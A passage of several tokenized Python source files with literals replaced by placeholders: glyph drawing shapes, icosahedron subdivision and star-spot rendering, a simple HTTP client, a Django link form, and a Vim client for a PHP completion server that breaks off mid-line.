<NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = scale_y ( shape , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = reflect_x ( reflect_y ( _glyphs [ '<STR_LIT>' ] , <NUM_LIT:0.5> ) , _glyphs [ '<STR_LIT>' ] . width / <NUM_LIT:2> ) <EOL> shape . width = _glyphs [ '<STR_LIT>' ] . width <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) - scale_x ( circle ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> ) , <NUM_LIT:0.5> , <NUM_LIT> ** <NUM_LIT:0.5> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:0>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:+>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:/>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:?>' ] = shape <EOL> del shape </s>
<s> import numpy as np <EOL> def make_isocosahedron ( ) : <EOL> g = ( <NUM_LIT:1.> + np . sqrt ( <NUM_LIT:5> ) ) / <NUM_LIT> <EOL> v = np . array ( [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , g ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , g ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - g ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , - g ] , <EOL> [ <NUM_LIT:1> , g , <NUM_LIT:0> ] , <EOL> [ - <NUM_LIT:1> , g , <NUM_LIT:0> ] , <EOL> [ - <NUM_LIT:1> , - g , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , - g , <NUM_LIT:0> ] , <EOL> [ g , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ g , <NUM_LIT:0> , - <NUM_LIT:1> ] , <EOL> [ - g , <NUM_LIT:0> , - <NUM_LIT:1> ] , <EOL> [ - g , <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> f = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:11> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:6> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:0> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:10> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:8> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:10> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:10> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:2> ] <EOL> ] ) <EOL> return ( f , v ) <EOL> def np_to_verts ( p ) : <EOL> x = np . ndarray . tolist ( p [ : , <NUM_LIT:0> ] ) <EOL> y = np . ndarray . tolist ( p [ : , <NUM_LIT:1> ] ) <EOL> z = np . ndarray . tolist ( p [ : , <NUM_LIT:2> ] ) <EOL> verts = [ zip ( x , y , z ) ] <EOL> return ( verts ) <EOL> def get_vertex_ind ( vert , point ) : <EOL> delta = np . sum ( np . power ( point - vert , <NUM_LIT> ) , axis = <NUM_LIT:1> ) <EOL> anydup = np . isclose ( delta , <NUM_LIT:0> ) <EOL> if np . any ( anydup ) : <EOL> return ( vert , np . ravel ( np . where ( anydup ) ) ) <EOL> else : <EOL> vert = np . append ( vert , [ point ] , axis = <NUM_LIT:0> ) <EOL> return ( vert , vert . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> def normalise_vertices ( v ) : <EOL> vs = v * v <EOL> vssum = np . power ( np . sum ( vs , axis = <NUM_LIT:1> ) , <NUM_LIT:0.5> ) <EOL> vn = v / vssum [ : , np . newaxis ] <EOL> return ( vn ) <EOL> def normit ( x ) : <EOL> nx = x / np . linalg . norm ( x , axis = <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> return ( nx ) <EOL> def split_iso ( fa , ve ) : <EOL> newface = np . empty ( ( <NUM_LIT:0> , <NUM_LIT:3> ) , dtype = int ) <EOL> for face in fa : <EOL> ip0 , ip1 , ip2 = face <EOL> p0 = ve [ ip0 ] <EOL> p1 = ve [ ip1 ] <EOL> p2 = ve [ ip2 ] <EOL> ( ve , ip3 ) = get_vertex_ind ( ve , ( p0 + p1 ) / <NUM_LIT> ) <EOL> ( ve , ip4 ) = get_vertex_ind ( ve , ( p1 + p2 ) / <NUM_LIT> ) <EOL> ( ve , ip5 ) = get_vertex_ind ( ve , ( p2 + p0 ) / <NUM_LIT> ) <EOL> newface = np . append ( newface , np . array ( [ [ ip0 , ip3 , ip5 ] , [ ip5 , ip3 , ip4 ] , [ ip3 , ip1 , ip4 ] , [ ip5 , ip4 , ip2 ] ] ) , axis = <NUM_LIT:0> ) <EOL> ven = normalise_vertices ( ve ) <EOL> return ( newface , ven ) <EOL> def sigmoid ( x ) : <EOL> '<STR_LIT>' <EOL> result = <NUM_LIT:1.> / ( <NUM_LIT:1.> + np . exp ( - x ) ) <EOL> return ( result ) <EOL> def starspot ( cosang , spotsize , angwid ) : <EOL> angle = np . arccos ( cosang ) * <NUM_LIT> / np . pi <EOL> tang = ( angle - spotsize ) / angwid <EOL> return ( sigmoid ( tang ) ) <EOL> def vec2sph ( vec ) : <EOL> theta = np . arcsin ( vec [ : , <NUM_LIT:0> ] ) <EOL> lambd = np . arctan2 ( vec [ : , <NUM_LIT:1> ] , vec [ : , <NUM_LIT:0> ] ) <EOL> return ( theta , lambd ) <EOL> def sph2vec ( theta , lambd ) : <EOL> xx = np . cos ( theta ) * np . cos ( lambd ) <EOL> yy = np . cos ( theta ) * np . sin ( lambd ) <EOL> zz = np . sin ( theta ) <EOL> return ( np . hstack ( ( xx , yy , zz ) ) ) <EOL> def intriangle ( tup , p1 , p2 , p3 ) : <EOL> '<STR_LIT>' <EOL> x , y = tup <EOL> x1 = p1 [ <NUM_LIT:0> ] <EOL> x2 = p2 [ <NUM_LIT:0> ] <EOL> x3 = p3 [ <NUM_LIT:0> ] <EOL> y1 = p1 [ <NUM_LIT:1> ] <EOL> y2 = p2 [ <NUM_LIT:1> ] <EOL> y3 = p3 [ <NUM_LIT:1> ] <EOL> a = ( ( y2 - y3 ) * ( x - x3 ) + ( x3 - x2 ) * ( y - y3 ) ) / ( ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) ) <EOL> b = ( ( y3 - y1 ) * ( x - x3 ) + ( x1 - x3 ) * ( y - y3 ) ) / ( ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) ) <EOL> c = <NUM_LIT:1> - a - b <EOL> T = ( a >= <NUM_LIT:0> ) & ( a <= <NUM_LIT:1> ) & ( b >= <NUM_LIT:0> ) & ( b <= <NUM_LIT:1> ) & ( c >= <NUM_LIT:0> ) & ( c <= <NUM_LIT:1> ) <EOL> tupout = ( x [ T ] , y [ T ] ) <EOL> return ( tupout ) <EOL> def triangle_image ( tup , p1 , p2 , p3 ) : <EOL> '<STR_LIT>' <EOL> y , x = tup <EOL> x1 = p1 [ <NUM_LIT:0> ] <EOL> x2 = p2 [ <NUM_LIT:0> ] <EOL> x3 = p3 [ <NUM_LIT:0> ] <EOL> y1 = p1 [ <NUM_LIT:1> ] <EOL> y2 = p2 [ <NUM_LIT:1> ] <EOL> y3 = p3 [ <NUM_LIT:1> ] <EOL> aden = ( y2 - y3 ) * ( x - x3 ) + ( x3 - x2 ) * ( y - y3 ) <EOL> adiv = ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) <EOL> bden = ( y3 - y1 ) * ( x - x3 ) + ( x1 - x3 ) * ( y - y3 ) <EOL> bdiv = ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) <EOL> if np . isclose ( adiv , <NUM_LIT:0.> ) : <EOL> a = <NUM_LIT:0.> <EOL> else : <EOL> a = aden / adiv <EOL> if np . isclose ( bdiv , <NUM_LIT:0.> ) : <EOL> b = <NUM_LIT:0.> <EOL> else : <EOL> b = bden / bdiv <EOL> c = <NUM_LIT:1> - a - b <EOL> T = ( a >= <NUM_LIT:0> ) & ( a <= <NUM_LIT:1> ) & ( b >= <NUM_LIT:0> ) & ( b <= <NUM_LIT:1> ) & ( c >= <NUM_LIT:0> ) & ( c <= <NUM_LIT:1> ) <EOL> return ( T ) <EOL> def rotx ( theta ) : <EOL> t = theta * np . pi / <NUM_LIT> <EOL> ct = np . cos ( t ) <EOL> st = np . sin ( t ) <EOL> m = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , ct , - st ] , <EOL> [ <NUM_LIT:0> , st , ct ] ] ) <EOL> return ( m ) <EOL> def roty ( theta ) : <EOL> t = theta * np . pi / <NUM_LIT> <EOL> ct = np . cos ( t ) <EOL> st = np . sin ( t ) <EOL> m = np . array ( [ [ ct , <NUM_LIT:0> , st ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ - st , <NUM_LIT:0> , ct ] ] ) <EOL> return ( m ) <EOL> def rotz ( theta ) : <EOL> t = theta * np . pi / <NUM_LIT> <EOL> ct = np . cos ( t ) <EOL> st = np . sin ( t ) <EOL> m = np . array ( [ [ ct , - st , <NUM_LIT:0> ] , <EOL> [ st , ct , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> return ( m ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from mpl_toolkits . mplot3d import Axes3D <EOL> from mpl_toolkits . mplot3d . art3d import Poly3DCollection <EOL> import matplotlib . pyplot as plt <EOL> import matplotlib as mpl <EOL> mpl . rc ( '<STR_LIT:image>' , interpolation = '<STR_LIT>' , origin = '<STR_LIT>' , cmap = '<STR_LIT>' ) <EOL> mpl . rc ( '<STR_LIT>' , limits = ( - <NUM_LIT:7> , <NUM_LIT:7> ) ) <EOL> fig = plt . figure ( ) <EOL> ax = Axes3D ( fig ) <EOL> ( fa , ve ) = make_isocosahedron ( ) <EOL> ve = normalise_vertices ( ve ) <EOL> print '<STR_LIT>' % ( fa . shape [ <NUM_LIT:0> ] , ve . shape [ <NUM_LIT:0> ] ) <EOL> ( fa2 , ve2 ) = split_iso ( fa , ve ) <EOL> print '<STR_LIT>' % ( fa2 . shape [ <NUM_LIT:0> ] , ve2 . shape [ <NUM_LIT:0> ] ) <EOL> ( fa3 , ve3 ) = split_iso ( fa2 , ve2 ) <EOL> print '<STR_LIT>' % ( fa3 . shape [ <NUM_LIT:0> ] , ve3 . shape [ <NUM_LIT:0> ] ) <EOL> ( fa4 , ve4 ) = split_iso ( fa3 , ve3 ) <EOL> print '<STR_LIT>' % ( fa4 . shape [ <NUM_LIT:0> ] , ve4 . shape [ <NUM_LIT:0> ] ) <EOL> ( fa5 , ve5 ) = split_iso ( fa4 , ve4 ) <EOL> print '<STR_LIT>' % ( fa5 . shape [ <NUM_LIT:0> ] , ve5 . shape [ <NUM_LIT:0> ] ) <EOL> ax . scatter ( ve [ : , <NUM_LIT:0> ] , ve [ : , <NUM_LIT:1> ] , ve [ : , <NUM_LIT:2> ] ) <EOL> ve3 = normalise_vertices ( ve3 ) <EOL> fa3_mean = np . mean ( ( ve3 [ fa3 ] ) , axis = <NUM_LIT:1> ) <EOL> facols_3 = np . abs ( fa3_mean ) <EOL> ve4 = normalise_vertices ( ve4 ) <EOL> fa4_mean = np . mean ( ( ve4 [ fa4 ] ) , axis = <NUM_LIT:1> ) <EOL> facols_4 = np . abs ( fa4_mean ) <EOL> ve5 = normalise_vertices ( ve5 ) <EOL> fa5_mean = np . mean ( ( ve5 [ fa5 ] ) , axis = <NUM_LIT:1> ) <EOL> facols_5 = np . abs ( fa5_mean ) <EOL> for ( face , facol ) in zip ( fa4 , facols_4 ) : <EOL> ax . add_collection3d ( Poly3DCollection ( np_to_verts ( ve4 [ face ] ) , color = facol ) ) <EOL> bdir1 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ] ) <EOL> bdir2 = np . array ( [ [ <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> n_bdir1 = normit ( bdir1 ) <EOL> n_bdir2 = normit ( bdir2 ) <EOL> n_fa5_mean = normit ( fa5_mean ) <EOL> ang1 = np . dot ( n_fa5_mean , n_bdir1 . T ) <EOL> ang2 = np . dot ( n_fa5_mean , n_bdir2 . T ) <EOL> cspot = starspot ( ang1 , <NUM_LIT> , <NUM_LIT> ) * starspot ( ang2 , <NUM_LIT:20> , <NUM_LIT:1.> ) <EOL> def fillstar2d ( im , tup , face , vert , tricol ) : <EOL> '<STR_LIT>' <EOL> for ( fa , col ) in zip ( face , tricol ) : <EOL> intri = triangle_image ( tup , vert [ fa [ <NUM_LIT:0> ] ] , vert [ fa [ <NUM_LIT:1> ] ] , vert [ fa [ <NUM_LIT:2> ] ] ) <EOL> im [ intri ] = im [ intri ] + col <EOL> return ( im ) <EOL> ty , tx = np . mgrid [ - <NUM_LIT> : <NUM_LIT> : <NUM_LIT> , - <NUM_LIT> : <NUM_LIT> : <NUM_LIT> ] <EOL> im0 = np . zeros ( ( ty . shape [ <NUM_LIT:0> ] , ty . shape [ <NUM_LIT:1> ] , <NUM_LIT:3> ) ) <EOL> intens = facols_3 <EOL> zplus = ( fa3_mean [ : , <NUM_LIT:2> ] > <NUM_LIT:0> ) <EOL> fa3_zplus = fa3 [ zplus ] <EOL> f = fillstar2d ( im0 , ( ty , tx ) , fa3_zplus , ve3 , intens [ zplus ] ) <EOL> fig = plt . figure ( ) <EOL> ax = plt . subplot ( <NUM_LIT> ) <EOL> plt . imshow ( f ) <EOL> fig = plt . figure ( ) <EOL> ax = Axes3D ( fig ) <EOL> for ( face , facol ) in zip ( fa3_zplus , facols_3 [ zplus ] ) : <EOL> ax . add_collection3d ( Poly3DCollection ( np_to_verts ( ve3 [ face ] ) , color = facol ) ) <EOL> plt . show ( ) <EOL> plt . draw ( ) <EOL> raw_input ( '<STR_LIT>' ) </s>
<s> import urlparse <EOL> import httplib <EOL> DEFAULT_TIMEOUT = None <EOL> def _validate_url ( url ) : <EOL> p = urlparse . urlsplit ( url ) <EOL> if p . scheme != '<STR_LIT:http>' : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> host = p . netloc <EOL> path = p . path <EOL> if p . query != '<STR_LIT>' : <EOL> path += "<STR_LIT:?>" + p . query <EOL> return host , path <EOL> def get ( url , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> conn . request ( '<STR_LIT:GET>' , path , body = None ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data <EOL> def put ( url , data , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> head = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> conn . request ( '<STR_LIT>' , path , data , head ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data <EOL> def post ( url , data , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> head = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> conn . request ( '<STR_LIT:POST>' , path , data , head ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data <EOL> def delete ( url , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> conn . request ( '<STR_LIT>' , path , body = None ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data </s>
<s> import re <EOL> from importlib import import_module <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . forms import CharField , ChoiceField , Textarea <EOL> from django . forms . models import ModelForm <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from . models import StyledLink , STYLEDLINK_MODELS <EOL> class StyledLinkForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = StyledLink <EOL> fields = ( <EOL> '<STR_LIT:label>' , <EOL> '<STR_LIT:title>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:target>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ext_destination = CharField ( <EOL> required = False , <EOL> widget = Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT> , } ) , <EOL> help_text = _ ( '<STR_LIT>' ) <EOL> ) <EOL> try : <EOL> from easy_select2 . widgets import Select2 <EOL> int_destination = ChoiceField ( <EOL> required = False , <EOL> help_text = _ ( '<STR_LIT>' ) , <EOL> widget = Select2 ( select2attrs = { '<STR_LIT:width>' : '<STR_LIT>' } ) , <EOL> ) <EOL> except : <EOL> int_destination = ChoiceField ( <EOL> required = False , <EOL> help_text = _ ( '<STR_LIT>' ) , <EOL> ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( StyledLinkForm , self ) . __init__ ( * args , ** kwargs ) <EOL> available_objects = [ ] <EOL> for item in STYLEDLINK_MODELS : <EOL> if '<STR_LIT:type>' in item : <EOL> model = item [ '<STR_LIT:type>' ] <EOL> else : <EOL> model = item [ '<STR_LIT>' ] <EOL> parts = item [ '<STR_LIT>' ] . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> cls = getattr ( import_module ( parts [ <NUM_LIT:0> ] ) , parts [ <NUM_LIT:1> ] ) <EOL> queryset = cls . objects <EOL> if '<STR_LIT>' in item : <EOL> queryset = getattr ( queryset , item [ '<STR_LIT>' ] ) ( ) <EOL> if '<STR_LIT>' in item : <EOL> for ( k , v ) in item [ '<STR_LIT>' ] . items ( ) : <EOL> try : <EOL> item [ '<STR_LIT>' ] [ k ] = v ( ) <EOL> except TypeError : <EOL> pass <EOL> queryset = queryset . filter ( ** item [ '<STR_LIT>' ] ) <EOL> else : <EOL> if not '<STR_LIT>' in item : <EOL> queryset = queryset . all ( ) <EOL> if '<STR_LIT>' in item : <EOL> queryset = queryset . order_by ( item [ '<STR_LIT>' ] ) <EOL> available_objects . append ( { <EOL> '<STR_LIT>' : model , <EOL> '<STR_LIT>' : list ( queryset ) , <EOL> } ) <EOL> object_choices = [ ] <EOL> object_choices . append ( ( "<STR_LIT>" , "<STR_LIT>" , ) ) <EOL> for group in sorted ( available_objects ) : <EOL> obj_list = [ ] <EOL> for obj in group [ '<STR_LIT>' ] : <EOL> type_class = ContentType . objects . get_for_model ( obj . __class__ ) <EOL> type_id = type_class . id <EOL> obj_id = obj . id <EOL> form_value = "<STR_LIT>" % ( type_id , obj_id ) <EOL> display_text = str ( obj ) <EOL> obj_list . append ( ( form_value , display_text ) ) <EOL> object_choices . append ( ( group [ '<STR_LIT>' ] , obj_list , ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = object_choices <EOL> if self . instance . int_destination : <EOL> type_class = ContentType . objects . get_for_model ( self . instance . int_destination . __class__ ) <EOL> type_id = type_class . id <EOL> obj_id = self . instance . int_destination . id <EOL> current_value = "<STR_LIT>" % ( type_id , obj_id ) <EOL> self . fields [ '<STR_LIT>' ] . initial = current_value <EOL> def save ( self , * args , ** kwargs ) : <EOL> try : <EOL> object_string = self . cleaned_data [ '<STR_LIT>' ] <EOL> matches = re . match ( "<STR_LIT>" , object_string ) . groups ( ) <EOL> object_type_id = matches [ <NUM_LIT:0> ] <EOL> object_id = matches [ <NUM_LIT:1> ] <EOL> object_type = ContentType . objects . get ( id = object_type_id ) <EOL> self . cleaned_data [ '<STR_LIT>' ] = object_type_id <EOL> self . cleaned_data [ '<STR_LIT>' ] = object_id <EOL> self . instance . int_destination_id = object_id <EOL> self . instance . int_destination_type = object_type <EOL> except : <EOL> self . cleaned_data [ '<STR_LIT>' ] = None <EOL> self . cleaned_data [ '<STR_LIT>' ] = None <EOL> self . instance . int_destination_id = None <EOL> self . instance . int_destination_type = None <EOL> return super ( StyledLinkForm , self ) . save ( * args , ** kwargs ) </s>
<s> import vim <EOL> from os import path <EOL> import json <EOL> import subprocess <EOL> import time <EOL> import re <EOL> import socket <EOL> server_addr = vim . eval ( '<STR_LIT>' ) <EOL> server_command = vim . eval ( '<STR_LIT>' ) <EOL> cli = vim . eval ( '<STR_LIT>' ) <EOL> composer = vim . eval ( '<STR_LIT>' ) <EOL> timeout = float ( vim . eval ( '<STR_LIT>' ) ) <EOL> padawanPath = path . join ( path . dirname ( __file__ ) , '<STR_LIT:..>' ) <EOL> BUFFER_SIZE = <NUM_LIT> <EOL> class Server : <EOL> def __init__ ( self ) : <EOL> fullAddr = server_addr . split ( "<STR_LIT::>" ) <EOL> self . addr = ( <EOL> fullAddr [ <NUM_LIT:0> ] , <EOL> int ( fullAddr [ <NUM_LIT:1> ] ) <EOL> ) <EOL> def start ( self ) : <EOL> command = '<STR_LIT>' . format ( <EOL> server_command , <EOL> padawanPath <EOL> ) <EOL> subprocess . Popen ( <EOL> command , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> self . socket = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> def stop ( self ) : <EOL> try : <EOL> self . sendRequest ( '<STR_LIT>' , { } ) <EOL> return True <EOL> except Exception : <EOL> return False <EOL> def restart ( self ) : <EOL> if self . stop ( ) : <EOL> self . start ( ) <EOL> def sendRequest ( self , command , params ) : <EOL> s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> s . connect ( self . addr ) <EOL> s . setsockopt ( socket . IPPROTO_TCP , socket . TCP_NODELAY , <NUM_LIT:1> ) <EOL> requestData = json . dumps ( { <EOL> '<STR_LIT>' : command , <EOL> '<STR_LIT>' : params <EOL> } ) <EOL> s . send ( requestData ) <EOL> response = "<STR_LIT>" <EOL> while <NUM_LIT:1> : <EOL> chunk = s . recv ( BUFFER_SIZE ) <EOL> if not chunk : <EOL> break <EOL> response += chunk <EOL> result = json . loads ( response ) <EOL> if "<STR_LIT:error>" in result : <EOL> raise Exception ( result [ "<STR_LIT:error>" ] ) <EOL> return result <EOL> class Editor : <EOL> def prepare ( self , message ) : <EOL> return message . replace ( "<STR_LIT:'>" , "<STR_LIT>" ) <EOL> def log ( self , message ) : <EOL> vim . command ( "<STR_LIT>" % self . prepare ( message ) ) <EOL> def notify ( self , message ) : <EOL> vim . command ( "<STR_LIT>" % self . prepare ( message ) ) <EOL> def progress ( self , progress ) : <EOL> bars = int ( progress / <NUM_LIT:5> ) <EOL> barsStr = '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> if i < bars : <EOL> barsStr += '<STR_LIT:=>' <EOL> else : <EOL> barsStr += '<STR_LIT:U+0020>' <EOL> barsStr = '<STR_LIT:[>' + barsStr + '<STR_LIT:]>' <EOL> vim . command ( <EOL> "<STR_LIT>" + barsStr + '<STR_LIT:U+0020>' + str ( progress ) + "<STR_LIT>" <EOL> ) <EOL> return <EOL> def error ( self , error ) : <EOL> self . notify ( error ) <EOL> def callAfter ( self , timeout , callback ) : <EOL> time . sleep ( timeout ) <EOL> while callback ( ) : <EOL> time . sleep ( timeout ) <EOL> server = Server ( ) <EOL> editor = Editor ( ) <EOL> pathError = '''<STR_LIT>''' <EOL> class PadawanClient : <EOL> def GetCompletion ( self , filepath , line_num , column_num , contents ) : <EOL> curPath = self . GetProjectRoot ( filepath ) <EOL> params = { <EOL> '<STR_LIT>' : filepath . replace ( curPath , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : line_num , <EOL> '<STR_LIT>' : column_num , <EOL> '<STR_LIT:path>' : curPath , <EOL> '<STR_LIT:data>' : contents <EOL> } <EOL> result = self . DoRequest ( '<STR_LIT>' , params , contents ) <EOL> if not result : <EOL> return { "<STR_LIT>" : [ ] } <EOL> return result <EOL> def GetClassesList ( self , cwd ) : <EOL> params = { <EOL> '<STR_LIT:path>' : cwd <EOL> } <EOL> return self . DoRequest ( "<STR_LIT:list>" , params ) <EOL> def SaveIndex ( self , filepath ) : <EOL> return self . DoRequest ( '<STR_LIT>' , { '<STR_LIT>' : filepath } ) <EOL> def DoRequest ( self , command , params , data = '<STR_LIT>' , tries = <NUM_LIT:1> ) : <EOL> try : <EOL> return server . sendRequest ( command , params ) <EOL> except socket . error as e : <EOL> if tries > <NUM_LIT:3> : <EOL> editor . error ( "<STR_LIT>" ) <EOL> else : <EOL> self . StartServer ( ) <EOL> return self . DoRequest ( command , params , tries + <NUM_LIT:1> ) <EOL> except Exception as e : <EOL> editor . error ( "<STR_LIT>" . format ( e . message ) ) <EOL> return False <EOL> def AddPlugin ( self , plugin ) : <EOL> composerCommand = composer + '<STR_LIT>' <EOL> command = '<STR_LIT>' . format ( <EOL> composerCommand , <EOL> cli , <EOL> plugin <EOL> ) <EOL> stream = subprocess . Popen ( <EOL> command , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess 